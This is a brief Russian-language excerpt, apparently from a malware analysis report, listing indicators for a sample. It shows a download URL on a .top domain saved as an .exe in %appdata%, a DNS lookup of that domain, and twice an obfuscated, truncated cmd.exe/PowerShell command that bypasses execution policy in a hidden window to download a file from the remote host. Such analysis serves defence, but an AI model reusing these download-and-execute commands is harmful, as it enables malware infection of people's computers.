Техническая информация
- http://www.wieekgodf.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OWeRS^HELL^.^EX^e ^-EXEcUT^iON^PO^liCy^ bYPAS^S -noPR^of^Ile ^-wiNDOWs^Tyl^e hiDdeN ^(n^ew-^O^bjE^C^t sy^STEm.N^eT.web^C^li^eNT)^.dOw^n^l^o^A^DfI^L^e^('http://www.wieekgodf.top/rea...
- DNS ASK wi###godf.top
- '<SYSTEM32>\cmd.exe' /C "P^OWeRS^HELL^.^EX^e ^-EXEcUT^iON^PO^liCy^ bYPAS^S -noPR^of^Ile ^-wiNDOWs^Tyl^e hiDdeN ^(n^ew-^O^bjE^C^t sy^STEm.N^eT.web^C^li^eNT)^.dOw^n^l^o^A^DfI^L^e^('http://www.wieekgodf.top/rea...' (со скрытым окном)